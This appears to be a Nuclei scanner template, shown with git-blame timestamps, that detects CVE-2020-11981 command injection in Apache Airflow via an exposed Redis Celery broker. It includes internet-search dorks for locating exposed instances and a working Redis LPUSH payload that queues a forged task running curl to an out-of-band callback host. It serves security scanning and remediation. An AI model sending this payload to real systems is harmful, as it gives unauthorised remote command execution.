2023-05-16 16:29:43 +00:00
id : CVE-2020-11981
info :
2023-05-16 18:09:07 +00:00
name : Apache Airflow <=1.10.10 - Command Injection
2023-05-16 16:29:43 +00:00
author : pussycat0x
severity : critical
description : |
An issue was found in Apache Airflow versions 1.10.10 and below. When using CeleryExecutor, if an attacker can connect to the broker (Redis, RabbitMQ) directly, it is possible to inject commands, resulting in the celery worker running arbitrary commands.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands on the target system.
remediation : Upgrade apache-airflow to version 1.10.11 or higher.
2023-05-16 16:29:43 +00:00
reference :
2023-05-16 20:33:10 +00:00
- https://github.com/apache/airflow/pull/9178
2023-05-17 13:16:14 +00:00
- https://github.com/vulhub/vulhub/tree/master/airflow/CVE-2020-11981
2024-01-14 13:49:27 +00:00
- https://lists.apache.org/thread.html/r7255cf0be3566f23a768e2a04b40fb09e52fcd1872695428ba9afe91%40%3Cusers.airflow.apache.org%3E
2024-01-29 17:11:14 +00:00
- https://github.com/t0m4too/t0m4to
- https://github.com/ARPSyndicate/cvemon
2023-05-29 11:32:09 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2023-06-03 18:56:35 +00:00
cvss-score : 9.8
2023-05-29 11:32:09 +00:00
cve-id : CVE-2020-11981
cwe-id : CWE-78
2024-06-07 10:04:29 +00:00
epss-score : 0.93315
epss-percentile : 0.99068
2024-01-14 13:49:27 +00:00
cpe : cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:*
2023-05-16 16:29:43 +00:00
metadata :
2023-09-27 15:51:13 +00:00
verified : true
2023-06-03 18:56:35 +00:00
max-request : 2
2024-01-14 13:49:27 +00:00
vendor : apache
product : airflow
2024-06-07 10:04:29 +00:00
shodan-query :
- product:"redis"
- http.title:"airflow - dags" || http.html:"apache airflow"
- http.title:"sign in - airflow"
fofa-query :
- apache airflow
- title="airflow - dags" || http.html:"apache airflow"
- title="sign in - airflow"
google-query :
- intitle:"airflow - dags" || http.html:"apache airflow"
- intitle:"sign in - airflow"
tags : cve,cve2020,network,redis,unauth,apache,airflow,vulhub,intrusive,tcp
2023-05-16 16:29:43 +00:00
variables :
2023-09-27 15:51:13 +00:00
data : "*3\r
$5\r
LPUSH\r
$7\r
default\r
$936\r
{\"content-encoding\": \"utf-8\", \"properties\": {\"priority\": 0, \"delivery_tag\": \"f29d2b4f-b9d6-4b9a-9ec3-029f9b46e066\", \"delivery_mode\": 2, \"body_encoding\": \"base64\", \"correlation_id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"delivery_info\": {\"routing_key\": \"celery\", \"exchange\": \"\"}, \"reply_to\": \"fb996eec-3033-3c10-9ee1-418e1ca06db8\"}, \"content-type\": \"application/json\", \"headers\": {\"retries\": 0, \"lang\": \"py\", \"argsrepr\": \"(100, 200)\", \"expires\": null, \"task\": \"airflow.executors.celery_executor.execute_command\", \"kwargsrepr\": \"{}\", \"root_id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"parent_id\": null, \"id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"origin\": \"gen1@132f65270cde\", \"eta\": null, \"group\": null, \"timelimit\": [null, null]}, \"body\": \""
2023-05-17 13:16:14 +00:00
encode1 : '[[["curl", "http://'
encode2 : '"]], {}, {"chain": null, "chord": null, "errbacks": null, "callbacks": null}]'
2023-05-16 20:33:10 +00:00
end : '"}'
2023-05-16 16:29:43 +00:00
tcp :
- inputs :
2023-09-27 15:51:13 +00:00
- data : "{{data+base64(encode1+'{{interactsh-url}}'+encode2)+concat(end+ '\r
')}}"
2023-05-16 18:09:07 +00:00
read : 1024
2023-05-16 16:29:43 +00:00
host :
- "{{Hostname}}"
- "{{Host}}:6379"
2023-06-13 08:52:29 +00:00
matchers-condition : and
2023-05-16 16:29:43 +00:00
matchers :
- type : word
part : interactsh_protocol
words :
2023-05-16 20:33:10 +00:00
- "http"
2023-05-18 09:28:30 +00:00
- type : word
part : interactsh_request
words :
- "User-Agent: curl"
2024-06-08 16:02:17 +00:00
# digest: 4a0a00473045022100aff8fbe7f62bca05b0a3fa63d1a8918e35f71377dd19c5be43e22541cfeeddb202203672beec85ae4ba8f222dc4cac2a57879abbce3ad9712bd31ee37bf90b052adf:922c64590222798bb761d5b6d8e72950
